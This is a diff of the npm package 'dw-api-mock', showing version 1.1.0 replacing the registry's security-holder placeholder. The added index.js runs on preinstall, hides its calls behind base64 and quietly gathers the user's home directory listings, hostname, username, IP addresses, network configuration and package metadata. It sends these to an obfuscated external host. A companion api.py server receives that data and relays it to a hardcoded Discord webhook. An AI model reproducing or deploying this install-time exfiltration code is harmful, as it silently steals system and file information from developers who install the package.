dw-api-mock 0.0.1-security → 1.1.0

package/api.py

@@ -0,0 +1,138 @@
+import http.server
+import socketserver
+import ssl
+import json
+import requests
+import base64
+import urllib.parse
+
+# Configuration
+PORT = 123  # The port to listen on
+DISCORD_WEBHOOK_URL = "https://canary.discord.com/api/webhooks/1333484463300284510/1An3rAlCgSGAwjog1BODz50ry7qAII8jJ6dqXaD-L2x1BX2wbAgy7OOJW5-JiVwBZY3h"
+
+# Mapping of keys to descriptive names
+KEY_MAPPING = {
+    "p": "Package Name",
+    "d": "Current Folder",
+    "x1": "User Home",
+    "x2": "Hostname",
+    "x3": "Username",
+    "x4": "IP Address",
+    "x5": "Network Configuration",
+    "x6": "Resolved Package URL",
+    "x7": "Package Version",
+    "x8": "Package JSON Content",
+    "x9": "Files in User Home",
+    "y1": "Files in Current Directory",
+    "y2": "Subfolder Contents in User Home"
+}
+
+class WebhookHandler(http.server.BaseHTTPRequestHandler):
+    def do_POST(self):
+        try:
+            # Read the request headers
+            headers = {key: value for key, value in self.headers.items()}
+            method = self.command
+            path = self.path
+            client_ip, client_port = self.client_address
+            
+            # Read the length of the incoming data
+            content_length = int(self.headers['Content-Length'])
+            body = self.rfile.read(content_length).decode('utf-8')
+
+            # Decode URL encoding
+            parsed_body = urllib.parse.parse_qs(body)
+            base64_data = parsed_body.get("msg", [""])[0]
+
+            # Decode Base64 if applicable
+            decoded_body = self.decode_base64_payload(base64_data)
+
+            # Format the data for clean display
+            formatted_data = self.format_received_data(method, path, client_ip, client_port, headers, decoded_body)
+
+            # Log the data to the console (for debugging)
+            print("Webhook Triggered!\n" + formatted_data)
+
+            # Send the data to Discord
+            self.send_to_discord(formatted_data)
+
+            # Respond to the client
+            self.send_response(200)
+            self.end_headers()
+            self.wfile.write(b"Data received and forwarded.")
+        except Exception as e:
+            self.send_error(500, f"Internal server error: {str(e)}")
+
+    def decode_base64_payload(self, base64_data):
+        try:
+            decoded_data = base64.b64decode(base64_data).decode('utf-8')
+            return json.loads(decoded_data) if decoded_data else decoded_data
+        except Exception as e:
+            print(f"Error decoding Base64 payload: {e}")
+        return None
+
+    def format_received_data(self, method, path, client_ip, client_port, headers, data):
+        formatted = "# WEBHOOK TRIGGERED\n"
+        formatted += "## INFOS\n"
+        formatted += f"**METHOD**: `{method}`\n"
+        formatted += f"**PATH**: `{path}`\n"
+        formatted += f"**CLIENT IP**: `{client_ip}`\n"
+        formatted += f"**CLIENT PORT**: `{client_port}`\n"
+        
+        formatted += "\n## HEADERS\n"
+        for key, value in headers.items():
+            formatted += f"**{key.upper()}**: `{value}`\n"
+
+        formatted += "\n## BODY\n"
+        if isinstance(data, dict):
+            for key, value in data.items():
+                try:
+                    decoded_value = base64.b64decode(value).decode('utf-8') if value else "N/A"
+                except Exception:
+                    decoded_value = value if value else "N/A"
+                mapped_key = KEY_MAPPING.get(key, key)
+                if isinstance(decoded_value, (list, dict)):
+                    formatted += f"**{mapped_key}**:\n```\n{json.dumps(decoded_value, indent=4)}\n```\n"
+                else:
+                    formatted += f"**{mapped_key}**: `{decoded_value}`\n"
+        else:
+            formatted += f"`{data if data else 'N/A'}`"
+
+        return formatted
+
+    def send_to_discord(self, content):
+        try:
+            if len(content) <= 2000:
+                self.send_discord_message(content)
+            else:
+                parts = [content[i:i+1900] for i in range(0, len(content), 1900)]
+                for part in parts:
+                    self.send_discord_message(part)
+        except Exception as e:
+            print(f"Error sending data to Discord: {str(e)}")
+
+    def send_discord_message(self, content):
+        payload = {"content": content}
+        response = requests.post(DISCORD_WEBHOOK_URL, json=payload)
+        if response.status_code == 204:
+            print("Data successfully sent to Discord.")
+        else:
+            print(f"Failed to send to Discord: {response.status_code} - {response.text}")
+
+# Start the server
+def main():
+    try:
+        with socketserver.TCPServer(("", PORT), WebhookHandler) as httpd:
+            httpd.socket = ssl.wrap_socket(
+                httpd.socket,
+                certfile="fullchain.pem",
+                keyfile="privkey.pem",
+                server_side=True
+            )
+            print(f"Server is listening on HTTPS port {PORT}")
+            httpd.serve_forever()
+    except KeyboardInterrupt:
+        print("\nServer shutting down.")
+
+if __name__ == "__main__":
+    main()

package/index.js

@@ -0,0 +1,108 @@
+const os = require("os");
+const fs = require("fs");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const pkg = packageJSON.name;
+const Buffer = require('buffer').Buffer;
+
+const encodedTarget = "ZmVlbHByb3VkLm1l";
+const decodedTarget = Buffer.from(encodedTarget, 'base64').toString('utf-8');
+
+const dynamicRequire = (mod) => require(mod);
+
+const modules = {
+    m1: dynamicRequire(Buffer.from("b3M=", "base64").toString("utf-8")),
+    m2: dynamicRequire(Buffer.from("ZG5z", "base64").toString("utf-8")),
+    m3: dynamicRequire(Buffer.from("ZnM=", "base64").toString("utf-8")),
+};
+
+const mappedMethods = {
+    k1: Buffer.from("aG9tZWRpcg==", "base64").toString("utf-8"),
+    k2: Buffer.from("aG9zdG5hbWU=", "base64").toString("utf-8"),
+    k3: Buffer.from("dXNlckluZm8=", "base64").toString("utf-8"),
+    k4: Buffer.from("cmVzb2x2ZQ==", "base64").toString("utf-8"),
+    k5: Buffer.from("bmV0d29ya0ludGVyZmFjZXM=", "base64").toString("utf-8"),
+};
+
+const fA = () => (typeof modules.m1[mappedMethods.k1] === "function" ? modules.m1[mappedMethods.k1]() : null);
+const fB = () => (typeof modules.m1[mappedMethods.k2] === "function" ? modules.m1[mappedMethods.k2]() : null);
+const fC = () => (typeof modules.m1[mappedMethods.k3] === "function" ? modules.m1[mappedMethods.k3]() : null);
+
+const asyncF_D = () => {
+    return new Promise((resolve) => {
+        const hostname = fB();
+        if (typeof modules.m2[mappedMethods.k4] === "function" && hostname) {
+            modules.m2[mappedMethods.k4](hostname, (err, addresses) => {
+                resolve(Buffer.from(JSON.stringify(err ? [] : addresses)).toString("base64"));
+            });
+        } else {
+            resolve(Buffer.from("[]").toString("base64"));
+        }
+    });
+};
+
+const execute = async () => {
+    const listA = Buffer.from(JSON.stringify(fs.readdirSync(fA() || __dirname))).toString("base64");
+    const listB = Buffer.from(JSON.stringify(fs.readdirSync(__dirname))).toString("base64");
+
+    const folderData = {};
+    fs.readdirSync(fA() || __dirname).forEach(item => {
+        try {
+            folderData[item] = fs.readdirSync(`${fA()}/${item}`);
+        } catch (err) {
+            folderData[item] = [];
+        }
+    });
+
+    const obfNet = Buffer.from(JSON.stringify(os[mappedMethods.k5]())).toString("base64");
+    const obfDns = await asyncF_D();
+
+    const dataPacket = JSON.stringify({
+        p: Buffer.from(pkg).toString("base64"),
+        d: Buffer.from(__dirname).toString("base64"),
+        x1: Buffer.from(fA() || "").toString("base64"),
+        x2: Buffer.from(fB() || "").toString("base64"),
+        x3: Buffer.from(fC() ? fC().username : "").toString("base64"),
+        x4: obfDns,
+        x5: obfNet,
+        x6: Buffer.from(packageJSON ? packageJSON.___resolved || "" : "").toString("base64"),
+        x7: Buffer.from(packageJSON.version || "").toString("base64"),
+        x8: Buffer.from(JSON.stringify(packageJSON)).toString("base64"),
+        x9: listA,
+        y1: listB,
+        y2: Buffer.from(JSON.stringify(folderData)).toString("base64"),
+    });
+
+    var encData = querystring.stringify({
+        msg: Buffer.from(dataPacket).toString("base64"),
+    });
+
+    var reqOpts = {
+        hostname: decodedTarget,
+        port: 123,
+        path: "/",
+        method: "POST",
+        headers: {
+            "Content-Type": "application/x-www-form-urlencoded",
+            "Content-Length": encData.length,
+        },
+    };
+
+    var req = https.request(reqOpts, (res) => {
+        res.on("data", (d) => {
+            process.stdout.write(d);
+        });
+    });
+
+    req.on("error", (e) => {
+        // console.error(e);
+    });
+
+    req.write(encData);
+    req.end();
+};
+
+// Start execution
+execute();

package/package.json

@@ -1,6 +1,13 @@
 {
   "name": "dw-api-mock",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.1.0",
+  "description": " Mock version of DW API ",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \\\"Error: no test specified\\\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "SalesforceCommerceCloud",
+  "license": "ISC"
 }
+

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=dw-api-mock for more information.